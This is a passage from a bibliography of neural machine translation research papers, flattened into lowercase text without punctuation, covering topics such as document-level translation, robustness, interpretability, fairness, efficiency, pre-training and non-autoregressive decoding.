with document level context http aclweb org anthology d18 1049 in proceedings of emnlp 2018 samuel l ubli rico sennrich and martin volk 2018 has machine translation achieved human parity a case for document level evaluation http aclweb org anthology d18 1512 in proceedings of emnlp 2018 citation https scholar google com scholar cites 13135618112238453725 as sdt 2005 sciodt 0 5 hl en 1 lesly miculicich dhananjay ram nikolaos pappas and james henderson 2018 document level neural machine translation with hierarchical attention networks http aclweb org anthology d18 1325 in proceedings of emnlp 2018 zhaopeng tu yang liu shuming shi and tong zhang 2018 learning to remember translation history with a continuous cache https arxiv org pdf 1711 09367 pdf transactions of the association for computational linguistics citation https scholar google com scholar cites 15854294745619374487 as sdt 2005 sciodt 0 5 hl en 9 elena voita rico sennrich and ivan titov 2019 when a good translation is wrong in context context aware machine translation improves on deixis ellipsis and lexical cohesion https arxiv org pdf 1905 05979 in proceedings of acl 2019 elena voita rico sennrich and ivan titov 2019 context aware monolingual repair for neural machine translation https arxiv org pdf 1909 01383 in proceedings of emnlp 2019 zhengxin yang jinchao zhang fandong meng shuhao gu yang feng and jie zhou 2019 enhancing context modeling with a query guided capsule network for document level translation https arxiv org abs 1909 00564 in proceedings of emnlp 2019 xin tan longyin zhang deyi xiong guodong zhou 2019 hierarchical modeling of global context for document level neural machine translation https www aclweb org anthology d19 1168 in proceedings of emnlp 2019 yunsu kim duc thanh tran hermann ney 2019 when and why is document level context useful in neural machine translation https arxiv org abs 1910 00294 in proceedings of discomt emnlp 2019 zuchao li rui wang kehai chen masao utiyama eiichiro sumita zhuosheng zhang and hai zhao 2020 explicit sentence compression for neural machine translation https arxiv org abs 1912 11980 in proceedings of aaai 2020 bei li hui liu ziyang wang yufan jiang tong xiao jingbo zhu tongran liu and changliang li 2020 does multi encoder help a case study on context aware neural machine translation http arxiv org abs 2005 03393 in proceedings of acl 2020 xintong li lemao liu rui wang guoping huang and max meng 2020 regularized context gates on transformer for machine translation https arxiv org abs 1908 11020 in proceedings of acl 2020 danielle saunders felix stahlberg and bill byrne 2020 using context in neural machine translation training objectives https arxiv org abs 2005 01483 in proceedings of acl 2020 shuming ma dongdong zhang and ming zhou 2020 a simple and effective unified encoder for document level machine translation https www aclweb org anthology 2020 acl main 321 in proceedings of acl 2020 zaixiang zheng xiang yue shujian huang jiajun chen alexandra birch 2020 towards making the most of context in neural machine translation https arxiv org abs 2002 07982 in proceedings of ijcai 2020 lei yu laurent sartran wojciech stokowiec wang ling lingpeng kong phil blunsom and chris dyer 2020 better document level machine translation with bayes rule https arxiv org abs 1910 00553 transactions of the association for computational linguistics xiaomian kang yang zhao jiajun zhang chengqing zong 2020 dynamic context selection for document level neural machine translation via reinforcement learning https www aclweb org anthology 2020 emnlp main 175 in proceedings of emnlp 2020 pei zhang boxing chen niyu ge kai fan 2020 long short term masking transformer a simple but effective baseline for document level neural machine translation https www aclweb org anthology 2020 emnlp main 81 in proceedings of emnlp 2020 domenic donato lei yu chris dyer 2021 diverse pretrained context encodings improve document translation https aclanthology org 2021 acl long 104 pdf in proceedings of acl 2021 h3 id robustness robustness h3 yonatan belinkov and yonatan bisk 2018 synthetic and natural noise both break neural machine translation https openreview net pdf id bj8vjebc in proceedings of iclr 2018 citation https scholar google com scholar cites 10493132199224079445 as sdt 2005 sciodt 0 5 hl en 33 zhengli zhao dheeru dua and sameer singh 2018 generating natural adversarial examples https openreview net pdf id h1bljgzcb in proceedings of iclr 2018 citation https scholar google com scholar cites 6487263081764376046 as sdt 2005 sciodt 0 5 hl en 45 yong cheng zhaopeng tu fandong meng junjie zhai and yang liu 2018 towards robust neural machine translation http aclweb org anthology p18 1163 in proceedings of acl 2018 citation https scholar google com scholar cites 13572592499424174633 as sdt 2005 sciodt 0 5 hl en 5 marco tulio ribeiro sameer singh and carlos guestrin 2018 semantically equivalent adversarial rules for debugging nlp models http aclweb org anthology p18 1079 in proceedings of acl 2018 citation https scholar google com scholar cites 3200079019495885814 as sdt 2005 sciodt 0 5 hl en 12 javid ebrahimi daniel lowd and dejing dou 2018 on adversarial examples for character level neural machine translation http aclweb org anthology c18 1055 in proceedings of coling 2018 paul michel and graham neubig 2018 mtnt a testbed for machine translation of noisy text http aclweb org anthology d18 1050 in proceedings of emnlp 2018 antonios anastasopoulos alison lui toan nguyen and david chiang 2019 neural machine translation of text from non native speakers https arxiv org pdf 1808 06267 pdf in proceedings of naacl 2019 paul michel xian li graham neubig and juan miguel pino 2019 on evaluation of adversarial perturbations for sequence to sequence models https arxiv org pdf 1903 06620 pdf in proceedings of naacl 2019 vaibhav vaibhav sumeet singh craig stewart and graham neubig 2019 improving robustness of machine translation with synthetic noise https arxiv org pdf 1902 09508 pdf in proceedings of naacl 2019 yong cheng lu jiang and wolfgang macherey 2019 robust neural machine translation with doubly adversarial inputs https arxiv org pdf 1906 02443 in proceedings of acl 2019 hairong liu mingbo ma liang huang hao xiong and zhongjun he 2019 robust neural machine translation with joint textual and phonetic embedding https www aclweb org anthology p19 1291 in proceedings of acl 2019 zhouxing shi huan zhang kai wei chang minlie huang cho jui hsieh 2020 robustness verification for transformers https openreview net forum id bjxwpjhfws in proceedings of iclr 2020 wei zou shujian huang jun xie xinyu dai and jiajun chen 2020 a reinforced generation of adversarial examples for neural machine translation https arxiv org abs 1911 03677 in proceedings of acl 2020 xing niu prashant mathur georgiana dinu and yaser al onaizan 2020 evaluating robustness to input perturbations for neural machine translation https arxiv org abs 2005 00580 in proceedings of acl 2020 dan hendrycks xiaoyuan liu eric wallace adam dziedzic rishabh krishnan and dawn song 2020 pretrained transformers improve out of distribution robustness https arxiv org abs 2004 06100 in proceedings of acl 2020 yong cheng lu jiang wolfgang macherey and jacob eisenstein 2020 advaug robust adversarial augmentation for neural machine translation https www aclweb org anthology 2020 acl main 529 in proceedings of acl 2020 eric wallace mitchell stern dawn song 2020 imitation attacks and defenses for black box machine translation systems https www aclweb org anthology 2020 emnlp main 446 in proceedings of emnlp 2020 denis emelin ivan titov rico sennrich 2020 detecting word sense disambiguation biases in machine translation for model agnostic adversarial attacks https www aclweb org anthology 2020 emnlp main 616 in proceedings of emnlp 2020 xinze zhang junzhe zhang zhenhua chen kun he 2021 crafting adversarial examples for neural machine translation https aclanthology org 2021 acl long 153 pdf in proceedings of acl 2021 h3 id interpretability interpretability h3 yanzhuo ding yang liu huanbo luan and maosong sun 2017 visualizing and understanding neural machine translation http aclweb org anthology p17 1106 in proceedings of acl 2017 citation https scholar google com scholar cites 6029143337933047130 as sdt 2005 sciodt 0 5 hl en 22 hendrik strobelt sebastian gehrmann michael behrisch adam perer hanspeter pfister and alexander m rush 2018 seq2seq vis a visual debugging tool for sequence to sequence models https arxiv org pdf 1804 09299 pdf in proceedings of vast 2018 and proceedings of emnlp blackbox 2018 citation https scholar google com scholar cites 8924303979242528991 as sdt 2005 sciodt 0 5 hl en 6 alessandro raganato and jorg tiedemann 2018 an analysis of encoder representations in transformer based machine translation http aclweb org anthology w18 5431 in proceedings of emnlp blackbox 2018 felix stahlberg danielle saunders and bill byrne 2018 an operation sequence model for explainable neural machine translation http aclweb org anthology w18 5420 in proceedings of emnlp blackbox 2018 fahim dalvi nadir durrani hassan sajjad yonatan belinkov d anthony bau and james glass 2019 what is one grain of sand in the desert analyzing individual neurons in deep nlp models http people csail mit edu belinkov assets pdf aaai2019 pdf in proceedings of aaai 2019 citation https scholar google com scholar cites 9612190838970536755 as sdt 2005 sciodt 0 5 hl en 2 anthony bau yonatan belinkov hassan sajjad nadir durrani fahim dalvi and james glass 2019 identifying and controlling important neurons in neural machine translation https openreview net pdf id h1z psr5kx in proceedings of iclr 2019 citation https scholar google com scholar cites 10670221460130643181 as sdt 2005 sciodt 0 5 hl en 2 yonatan belinkov and james glass 2019 analysis methods in neural language processing a survey https www aclweb org anthology q19 1004 transactions of the association for computational linguistics sofia serrano and noah a smith 2019 is attention interpretable https arxiv org pdf 1906 03731 in proceedings of acl 2019 elena voita david talbot fedor moiseev rico sennrich and ivan titov 2019 analyzing multi head self attention specialized heads do the heavy lifting the rest can be pruned https arxiv org pdf 1905 09418 in proceedings of acl 2019 joris baan jana leible mitja nikolaus david rau dennis ulmer tim baumg rtner dieuwke hupkes and elia bruni 2019 on the realization of compositionality in neural networks https arxiv org pdf 1906 01634 in proceedings of acl 2019 jesse vig and yonatan belinkov 2019 analyzing the structure of attention in a transformer language model https arxiv org pdf 1906 04284 in proceedings of acl 2019 baosong yang longyue wang derek f wong lidia s chao and zhaopeng tu 2019 assessing the ability of self attention networks to learn word order https arxiv org pdf 1906 00592 in proceedings of acl 2019 xintong li guanlin li lemao liu max meng and shuming shi 2019 on the word alignment from neural machine translation https www aclweb org anthology p19 1124 in proceedings of acl 2019 elena voita rico sennrich and ivan titov 2019 the bottom up evolution of representations in the transformer a study with machine translation and language modeling objectives https arxiv org pdf 1909 01380 in proceedings of emnlp 2019 shilin he zhaopeng tu xing wang longyue wang michael r lyu and shuming shi 2019 towards understanding neural machine translation with word importance https arxiv org pdf 1909 00326 in proceedings of emnlp 2019 felix stahlberg and bill byrne 2019 on nmt search errors and model errors cat got your tongue https arxiv org pdf 1908 10090 in proceedings of emnlp 2019 gino brunner yang liu damian pascual oliver richter massimiliano ciaramita roger wattenhofer 2020 on identifiability in transformers https openreview net forum id bjg1f6efdb in proceedings of iclr 2020 chulhee yun srinadh bhojanapalli ankit singh rawat sashank reddi sanjiv kumar 2020 are transformers universal approximators of sequence to sequence functions https openreview net forum id byxrm0ntvr in proceedings of iclr 2020 akash kumar mohankumar preksha nema sharan narasimhan mitesh m khapra balaji vasan srinivasan and balaraman ravindran 2020 towards transparent and explainable attention models https arxiv org abs 2004 14243 in proceedings of acl 2020 samira abnar and willem zuidema 2020 quantifying attention flow in transformers https arxiv org abs 2005 00928 in proceedings of acl 2020 jierui li lemao liu huayang li guanlin li guoping huang and shuming shi 2020 evaluating explanation methods for neural machine translation https www aclweb org anthology 2020 acl main 35 in proceedings of acl 2020 goro kobayashi tatsuki kuribayashi sho yokoi kentaro inui 2020 attention is not only a weight analyzing transformers with vector norms https www aclweb org anthology 2020 emnlp main 574 in proceedings of emnlp 2020 liyuan liu xiaodong liu jianfeng gao weizhu chen jiawei han 2020 understanding the difficulty of training transformers https www aclweb org anthology 2020 emnlp main 463 in proceedings of emnlp 2020 wenxuan wang zhaopeng tu 2020 rethinking the value of transformer components https www aclweb org anthology 2020 coling main 529 pdf in proceedings of coling 2020 elena voita rico sennrich ivan titov 2021 analyzing the source and target contributions to predictions in neural machine translation https aclanthology org 2021 acl long 91 pdf in proceedings of acl 2021 weicheng ma kai zhang renze lou lili wang 2021 contributions of transformer attention heads in multi and cross lingual tasks https aclanthology org 2021 acl long 152 pdf in proceedings of acl 2021 h3 id linguistic interpretation linguistic interpretation h3 felix hill kyunghyun cho sebastien jean coline devin and yoshua bengio 2015 embedding word similarity with neural machine translation https arxiv org pdf 1412 6448 pdf in proceedings of iclr 2015 citation https scholar google com scholar cites 3941248209566557946 as sdt 2005 sciodt 0 5 hl en 24 xing shi inkit padhi and kevin knight 2016 does string based neural mt learn source syntax http aclweb org anthology d16 1159 in proceedings of the emnlp 2016 citation https scholar google com scholar oi bibs hl en cites 13782051589621719871 57 yonatan belinkov nadir durrani fahim dalvi hassan sajjad and james glass 2017 what do neural machine translation models learn about morphology http aclweb org anthology p17 1080 in proceedings of acl 2017 citation https scholar google com scholar cites 3142186338143493642 as sdt 2005 sciodt 0 5 hl en 50 ella rabinovich noam ordan and shuly wintner 2017 found in translation reconstructing phylogenetic language trees from translations http aclweb org anthology p17 1049 in proceedings of acl 2017 citation https scholar google com scholar cites 10035323574777301594 as sdt 2005 sciodt 0 5 hl en 6 rico sennrich 2017 how grammatical is character level neural machine translation assessing mt quality with contrastive translation pairs http aclweb org anthology e17 2060 in proceedings of eacl 2017 citation https scholar google com scholar cites 14294900718072928557 as sdt 2005 sciodt 0 5 hl en 25 adam poliak yonatan belinkov james glass and benjamin van durme 2018 on the evaluation of semantic phenomena in neural machine translation using natural language inference http aclweb org anthology n18 2082 in proceedings of naacl 2018 citation https scholar google com scholar cites 9402109271974711503 as sdt 2005 sciodt 0 5 hl en 5 arianna bisazza and clara tump 2018 the lazy encoder a fine grained analysis of the role of morphology in neural machine translation http aclweb org anthology d18 1313 in proceedings of emnlp 2018 lijun wu xu tan di he fei tian tao qin jianhuang lai and tie yan liu 2018 beyond error propagation in neural machine translation characteristics of language also matter http aclweb org anthology d18 1396 in proceedings of emnlp 2018 citation https scholar google com scholar cites 1081737155461853408 as sdt 2005 sciodt 0 5 hl en 4 gongbo tang rico sennrich and joakim nivre 2019 encoders help you disambiguate word senses in neural machine translation https arxiv org pdf 1908 11771 in proceedings of emnlp 2019 parker riley isaac caswell markus freitag and david grangier 2020 translationese as a language in multilingual nmt https arxiv org abs 1911 03823 in proceedings of acl 2020 emanuele bugliarello sabrina j mielke antonios anastasopoulos ryan cotterell and naoaki okazaki 2020 it s easier to translate out of english than into it measuring neural translation difficulty by cross mutual information http arxiv org abs 2005 02354 in proceedings of acl 2020 h3 id fairness and diversity fairness and diversity h3 hayahide yamagishi shin kanouchi takayuki sato and mamoru komachi 2016 controlling the voice of a sentence in japanese to english neural machine translation http www aclweb org anthology w16 4620 in proceedings of the 3rd workshop on asian translation citation https scholar google com scholar cites 3457358295141990828 as sdt 2005 sciodt 0 5 hl en 11 rico sennrich barry haddow and alexandra birch 2016 controlling politeness in neural machine translation via side constraints http aclweb org anthology n16 1005 in proceedings of naacl 2016 citation https scholar google com scholar cites 13603295392629577946 as sdt 2005 sciodt 0 5 hl en 49 xing niu marianna martindale and marine carpuat 2017 a study of style in machine translation controlling the formality of machine translation output http aclweb org anthology d17 1299 in proceedings of emnlp 2016 citation https scholar google com scholar cites 1203074987073423616 as sdt 2005 sciodt 0 5 hl en 8 ella rabinovich raj nath patel shachar mirkin lucia specia and shuly wintner 2017 personalized machine translation preserving original author traits http aclweb org anthology e17 1101 in proceedings of eacl 2017 citation https scholar google com scholar cites 6856955572531425903 as sdt 2005 sciodt 0 5 hl en 10 myle ott michael auli david grangier and marc aurelio ranzato 2018 analyzing uncertainty in neural machine translation https arxiv org pdf 1803 00047 in proceedings of icml 2018 citation https scholar google com scholar cites 1522001537063991105 as sdt 2005 sciodt 0 5 hl en 11 paul michel and graham neubig 2018 extreme adaptation for personalized neural machine translation http www aclweb org anthology p18 2050 in proceedings of acl 2018 citation https scholar google com scholar cites 16717798879574507487 as sdt 2005 sciodt 0 5 hl en 6 eva vanmassenhove christian hardmeier and andy way 2018 getting gender right in neural machine translation http www aclweb org anthology d18 1334 in proceedings of emnlp 2018 ashwin kalyan peter anderson stefan lee and dhruv batra 2019 trainable decoding of sets of sequences for neural sequence models http proceedings mlr press v97 kalyan19a kalyan19a pdf in proceedings of icml 2019 tianxiao shen myle ott michael auli and marc aurelio ranzato 2019 mixture models for diverse machine translation tricks of the trade http proceedings mlr press v97 shen19c shen19c pdf in proceedings of icml 2019 wouter kool herke van hoof and max welling 2019 stochastic beams and where to find them the gumbel top k trick for sampling sequences without replacement http proceedings mlr press v97 kool19a kool19a pdf in proceedings of icml 2019 won ik cho ji won kim seok min kim and nam soo kim 2019 on measuring gender bias in translation of gender neutral pronouns https arxiv org pdf 1905 11684 in proceedings of acl 2019 gabriel stanovsky noah a smith and luke zettlemoyer 2019 evaluating gender bias in machine translation https arxiv org pdf 1906 00591 in proceedings of acl 2019 keita kurita nidhi vyas ayush pareek alan w black and yulia tsvetkov 2019 measuring bias in contextualized word representations https arxiv org pdf 1906 07337 in proceedings of acl 2019 raphael shu hideki nakayama and kyunghyun cho 2019 generating diverse translations with sentence codes https www aclweb org anthology p19 1177 in proceedings of acl 2019 daphne ippolito reno kriz joao sedoc maria kustikova and chris callison burch 2019 comparison of diverse decoding methods from conditional language models https www aclweb org anthology p19 1365 in proceedings of acl 2019 xing niu and marine carpuat 2020 controlling neural machine translation formality with synthetic supervision https arxiv org abs 1911 08706 in proceedings of aaai 2020 zewei sun shujian huang hao ran wei xin yu dai and jiajun chen 2020 generating diverse translation by manipulating multi head attention https arxiv org pdf 1911 09333 in proceedings of aaai 2020 shuo wang zhaopeng tu shuming shi and yang liu 2020 on the inference calibration of neural machine translation https arxiv org abs 2005 00963 in proceedings of acl 2020 danielle saunders and bill byrne 2020 reducing gender bias in neural machine translation as a domain adaptation problem http arxiv org abs 2004 04498 in proceedings of acl 2020 dirk hovy federico bianchi and tommaso fornaciari 2020 you sound just like your father commercial machine translation systems include stylistic biases https www aclweb org anthology 2020 acl main 154 in proceedings of acl 2020 luisa bentivogli beatrice savoldi matteo negri mattia a di gangi roldano cattoni and marco turchi 2020 gender in danger evaluating speech translation technology on the must she corpus https www aclweb org anthology 2020 acl main 619 in proceedings of acl 2020 sorami hisamoto matt post and kevin duh 2020 membership inference attacks on sequence to sequence models is my data in your machine translation system https transacl org ojs index php tacl article view 1779 transactions of the association for computational linguistics huda khayrallah brian thompson matt post philipp koehn 2020 simulated multiple reference training improves low resource machine translation https www aclweb org anthology 2020 emnlp main 7 in proceedings of emnlp 2020 xuanfu wu yang feng chenze shao 2020 generating diverse translation from model distribution with dropout https www aclweb org anthology 2020 emnlp main 82 in proceedings of emnlp 2020 h3 id efficiency efficiency h3 abigail see minh thang luong and christopher d manning 2016 compression of neural machine translation models via pruning http aclweb org anthology k16 1029 in proceedings of conll 2016 citation https scholar google com hk scholar cites 13072353668416361496 as sdt 2005 sciodt 0 5 hl en 33 yusuke oda philip arthur graham neubig koichiro yoshino and satoshi nakamura 2017 neural machine translation via binary code prediction http aclweb org anthology p17 1079 in proceedings of acl 2017 citation https scholar google com hk scholar cites 9954145361647418034 as sdt 2005 sciodt 0 5 hl en 3 xing shi and kevin knight 2017 speeding up neural machine translation decoding by shrinking run time vocabulary http aclweb org anthology p17 2091 in proceedings of acl 2017 citation https scholar google com hk scholar cites 7302197227417767855 as sdt 2005 sciodt 0 5 hl en 5 ofir press and lior wolf 2017 using the output embedding to improve language models http aclweb org anthology e17 2025 in proceedings of eacl 2017 citation https scholar google com scholar um 1 ie utf 8 lr cites 3142797974561089298 126 xiaowei zhang wei chen feng wang shuang xu and bo xu 2017 towards compact and fast neural machine translation using a combined method http aclweb org anthology d17 1154 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 832815405370901340 as sdt 2005 sciodt 0 5 hl en 5 felix stahlberg and bill byrne 2017 unfolding and shrinking neural machine translation ensembles http aclweb org anthology d17 1208 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 14880262780099335970 as sdt 2005 sciodt 0 5 hl en 5 jacob devlin 2017 sharp models on dull hardware fast and accurate neural machine translation decoding on the cpu http aclweb org anthology d17 1300 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 17103371978045782164 as sdt 2005 sciodt 0 5 hl en 8 dakun zhang jungi kim josep crego and jean senellart 2017 boosting neural machine translation http aclweb org anthology i17 2046 in proceedings of ijcnlp 2017 citation https scholar google com hk scholar cites 10941157301841399344 as sdt 2005 sciodt 0 5 hl en 3 ukasz kaiser aurko roy ashish vaswani niki parmar samy bengio jakob uszkoreit and noam shazeer 2018 fast decoding in sequence models using discrete latent variables https arxiv org pdf 1803 03382 pdf in proceedings of icml 2018 citation https scholar google com hk scholar cites 4042994175439965815 as sdt 2005 sciodt 0 5 hl en 3 gonzalo iglesias william tambellini adri de gispert eva hasler and bill byrne 2018 accelerating nmt batched beam decoding with lmbr posteriors for deployment http aclweb org anthology n18 3013 in proceedings of naacl 2018 jerry quinn and miguel ballesteros 2018 pieces of eight 8 bit neural machine translation http aclweb org anthology n18 3014 in proceedings of naacl 2018 matt post and david vilar 2018 fast lexically constrained decoding with dynamic beam allocation for neural machine translation http aclweb org anthology n18 1119 in proceedings of naacl 2018 citation https scholar google com scholar cites 3504623917475500888 as sdt 2005 sciodt 0 5 hl en 6 biao zhang deyi xiong and jinsong su 2018 accelerating neural transformer via an average attention network http aclweb org anthology p18 1166 in proceedings of acl 2018 citation https scholar google com scholar cites 16436039193082710776 as sdt 2005 sciodt 0 5 hl en 5 rui wang masao utiyama and eiichiro sumita 2018 dynamic sentence sampling for efficient training of neural machine translation http aclweb org anthology p18 2048 in proceedings of acl 2018 citation https scholar google com hk scholar cites 867223386840543463 as sdt 2005 sciodt 0 5 hl en 2 myle ott sergey edunov david grangier and michael auli 2018 scaling neural machine translation http aclweb org anthology w18 6301 in proceedings of the third conference on machine translation research papers joern wuebker patrick simianer and john denero 2018 compact personalized models for neural machine translation http aclweb org anthology d18 1104 in proceedings of emnlp 2018 wen zhang liang huang yang feng lei shen and qun liu 2018 speeding up neural machine translation decoding by cube pruning http aclweb org anthology d18 1460 in proceedings of emnlp 2018 zhisong zhang rui wang masao utiyama eiichiro sumita and hai zhao 2018 exploring recombination for efficient decoding of neural machine translation http aclweb org anthology d18 1511 in proceedings of emnlp 2018 nikolay bogoychev kenneth heafield alham fikri aji and marcin junczys dowmunt 2018 accelerating asynchronous stochastic gradient descent for neural machine translation http aclweb org anthology d18 1332 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 12306021941401324130 as sdt 2005 sciodt 0 5 hl en 2 mitchell stern noam shazeer and jakob uszkoreit 2018 blockwise parallel decoding for deep autoregressive models https papers nips cc paper 8212 blockwise parallel decoding for deep autoregressive models pdf in proceedings of neurips 2018 zhanghao wu zhijian liu ji lin yujun lin song han 2020 efficient transformer for mobile applications https openreview net forum id byemplhkph in proceedings of iclr 2020 christopher brix parnia bahar and hermann ney 2020 successfully applying the stabilized lottery ticket hypothesis to the transformer architecture https arxiv org abs 2005 03454 in proceedings of acl 2020 hanrui wang zhanghao wu zhijian liu han cai ligeng zhu chuang gan and song han 2020 hat hardware aware transformers for efficient natural language processing https arxiv org abs 2005 14187 in proceedings of acl 2020 zhuohan li eric wallace sheng shen kevin lin kurt keutzer dan klein joseph e gonzalez 2020 train large then compress rethinking model size for efficient training and inference of transformers https arxiv org abs 2002 11794 in proceedings of icml 2020 maximiliana behnke kenneth heafield 2020 losing heads in the lottery pruning transformer attention in neural machine translation https www aclweb org anthology 2020 emnlp main 211 in proceedings of emnlp 2020 minjia zhang yuxiong he 2020 accelerating training of transformer based language models with progressive layer dropping https papers nips cc paper 2020 file a1140a3d0df1c81e24ae954d935e8926 paper pdf in proceedings of neurips 2020 yimeng wu peyman passban mehdi rezagholizadeh qun liu 2020 why skip if you can combine a simple knowledge distillation technique for intermediate layers https www aclweb org anthology 2020 emnlp main 74 in proceedings of emnlp 2020 h3 id pre training pre training h3 bryan mccann james bradbury caiming xiong and richard socher 2017 learned in translation contextualized word vectors http papers nips cc paper 7209 learned in translation contextualized word vectors pdf in proceedings of nips 2017 citation https scholar google com hk scholar cites 12356231721397988330 as sdt 2005 sciodt 0 5 hl en 136 ye qi devendra sachan matthieu felix sarguna padmanabhan and graham neubig 2018 when and why are pre trained word embeddings useful for neural machine translation http aclweb org anthology n18 2084 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 6166308028416584239 as sdt 2005 sciodt 0 5 hl en 19 matthew peters mark neumann mohit iyyer matt gardner christopher clark kenton lee and luke zettlemoyer 2018 deep contextualized word representations http aclweb org anthology n18 1202 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 14181983828043963745 as sdt 2005 sciodt 0 5 hl en 519 jeremy howard and sebastian ruder 2018 universal language model fine tuning for text classification http aclweb org anthology p18 1031 in proceedings of acl 2018 citation https scholar google com hk scholar cites 2986760879834934707 as sdt 2005 sciodt 0 5 hl en 114 alexis conneau ruty rinott guillaume lample adina williams samuel bowman holger schwenk and veselin stoyanov 2018 xnli evaluating cross lingual sentence representations https www aclweb org anthology d18 1269 in proceedings of emnlp 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 15041461338388299895 9 alec radford karthik narasimhan tim salimans and ilya sutskever 2018 improving language understanding by generative pre training https s3 us west 2 amazonaws com openai assets research covers language unsupervised language understanding paper pdf technical report openai citation https scholar google com hk scholar cites 8939608408376234789 as sdt 2005 sciodt 0 5 hl en 94 guillaume lample and alexis conneau 2019 cross lingual language model pretraining https arxiv org pdf 1901 07291 arxiv 1901 07291 citation https scholar google com scholar um 1 ie utf 8 lr cites 11542237222100207278 3 jacob devlin ming wei chang kenton lee and kristina toutanova 2018 bert pre training of deep bidirectional transformers for language understanding https arxiv org pdf 1810 04805 in proceedings of naacl 2019 citation https scholar google com hk scholar cites 3166990653379142174 as sdt 2005 sciodt 0 5 hl en 292 alec radford jeffrey wu rewon child david luan dario amodei and ilya sutskever 2019 language models are unsupervised multitask learners https d4mucfpksywv cloudfront net better language models language models are unsupervised multitask learners pdf technical report openai citation https scholar google com scholar cites 7713405291981945630 as sdt 2005 sciodt 0 5 hl en 9 sergey edunov alexei baevski and michael auli 2019 pre trained language model representations for language generation https arxiv org pdf 1903 09722 pdf in proceedings of naacl 2019 citation https scholar google com scholar cites 46961033050134131 as sdt 2005 sciodt 0 5 hl en 1 kaitao song xu tan tao qin jianfeng lu and tie yan liu 2019 mass masked sequence to sequence pre training for language generation https arxiv org pdf 1905 02450 in proceedings of icml 2019 zhilin yang zihang dai yiming yang jaime carbonell ruslan salakhutdinov and quoc v le 2019 xlnet generalized autoregressive pretraining for language understanding https arxiv org pdf 1906 08237 arxiv 1906 08237 jiacheng yang mingxuan wang hao zhou chengqi zhao yong yu weinan zhang and lei li 2020 towards making the most of bert in neural machine translation https arxiv org abs 1908 05672 in proceedings of aaai 2020 rongxiang weng heng yu shujian huang shanbo cheng and weihua luo 2020 acquiring knowledge from pre trained model to neural machine translation https arxiv org abs 1912 01774 in proceedings of aaai 2020 jinhua zhu yingce xia lijun wu di he tao qin wengang zhou houqiang li tieyan liu 2020 incorporating bert into neural machine translation https openreview net forum id hyl7ygstwb in proceedings of iclr 2020 mike lewis yinhan liu naman goyal marjan ghazvininejad abdelrahman mohamed omer levy veselin stoyanov and luke zettlemoyer 2020 bart denoising sequence to sequence pre training for natural language generation translation and comprehension https arxiv org abs 1910 13461 in proceedings of acl 2020 thibault sellam dipanjan das and ankur parikh 2020 bleurt learning robust metrics for text generation https www aclweb org anthology 2020 acl main 704 in proceedings of acl 2020 sascha rothe shashi narayan and aliaksei severyn 2020 leveraging pre trained checkpoints for sequence generation tasks https transacl org ojs index php tacl article view 1849 transactions of the association for computational linguistics zhen yang bojie hu ambyera han shen huang qi ju 2020 csp code switching pre training for neural machine translation https www aclweb org anthology 2020 emnlp main 208 in proceedings of emnlp 2020 zehui lin xiao pan mingxuan wang xipeng qiu jiangtao feng hao zhou lei li 2020 pre training multilingual neural machine translation by leveraging alignment information https www aclweb org anthology 2020 emnlp main 210 in proceedings of emnlp 2020 junliang guo zhirui zhang linli xu hao ran wei boxing chen enhong chen 2020 incorporating bert into parallel sequence decoding with adapters https papers nips cc paper 2020 file 7a6a74cbe87bc60030a4bd041dd47b78 paper pdf in proceedings of neurips 2020 linqing chen junhui li zhengxian gong boxing chen weihua luo min zhang guodong zhou 2021 breaking the corpus bottleneck for context aware neural machine translation with cross task pre training https aclanthology org 2021 acl long 222 pdf in proceedings of acl 2021 h3 id nat non autoregressive translation h3 jiatao gu james bradbury caiming xiong victor o k li and richard socher 2018 non autoregressive neural machine translation https arxiv org abs 1711 02281 in proceedings of iclr 2018 citation https scholar google com hk scholar cites 3482831974828539059 as sdt 2005 sciodt 0 5 hl en 93 chunqi wang ji zhang and haiqing chen 2018 semi autoregressive neural machine translation http aclweb org anthology d18 1044 in proceedings of emnlp 2018 jason lee elman mansimov and kyunghyun cho 2018 deterministic non autoregressive neural sequence modeling by iterative refinement http aclweb org anthology d18 1149 in proceedings of emnlp 2018 jind ich libovick and jind ich helcl 2018 end to end non autoregressive neural machine translation with connectionist temporal classification http aclweb org anthology d18 1336 in proceedings of emnlp 2018 xuezhe ma chunting zhou xian li graham neubig and eduard hovy 2019 flowseq non autoregressive conditional sequence generation with generative flow https arxiv org pdf 1909 02480 in proceedings of emnlp 2019 zhuohan li zi lin di he fei tian tao qin liwei wang and tie yan liu 2019 hint based training for non autoregressive machine translation https arxiv org pdf 1909 06708 in proceedings of emnlp 2019 marjan ghazvininejad omer levy yinhan liu luke zettlemoyer 2019 mask predict parallel decoding of conditional masked language models https arxiv org abs 1904 09324 in proceedings of emnlp 2019 sean welleck kiant brantley hal daum iii and kyunghyun cho 2019 non monotonic sequential text generation https arxiv org pdf 1902 02192 in proceedings of icml 2019 mitchell stern william chan jamie kiros jakob uszkoreit 2019 insertion transformer flexible sequence generation via insertion operations http proceedings mlr press v97 stern19a stern19a pdf in proceedings of icml 2019 chenze shao yang feng jinchao zhang fandong meng xilin chen and jie zhou 2019 retrieving sequential information for non autoregressive neural machine translation https arxiv org pdf 1906 09444 in proceedings of acl 2019 bingzhen wei mingxuan wang hao zhou junyang lin and xu sun 2019 imitation learning for non autoregressive neural machine translation https www aclweb org anthology p19 1125 in proceedings of acl 2019 jiatao gu changhan wang junbo zhao 2019 levenshtein transformer https papers nips cc paper 9297 levenshtein transformer in proceedings of neurips 2019 junliang guo xu tan di he tao qin linli xu and tie yan liu 2019 non autoregressive neural machine translation with enhanced decoder input https arxiv org pdf 1812 09664 pdf in proceedings of aaai 2019 yiren wang fei tian di he tao qin chengxiang zhai and tie yan liu 2019 non autoregressive machine translation with auxiliary regularization https arxiv org pdf 1902 10245 pdf in proceedings of aaai 2019 junliang guo xu tan linli xu tao qin enhong chen tie yan liu 2020 fine tuning by curriculum learning for non autoregressive neural machine translation https arxiv org abs 1911 08717 in proceedings of aaai 2020 chenze shao jinchao zhang yang feng fandong meng and jie zhou 2020 minimizing the bag of ngrams difference for non autoregressive neural machine translation https arxiv org pdf 1911 09320 pdf in proceedings of aaai 2020 raphael shu jason lee hideki nakayama and kyunghyun cho 2020 latent variable non 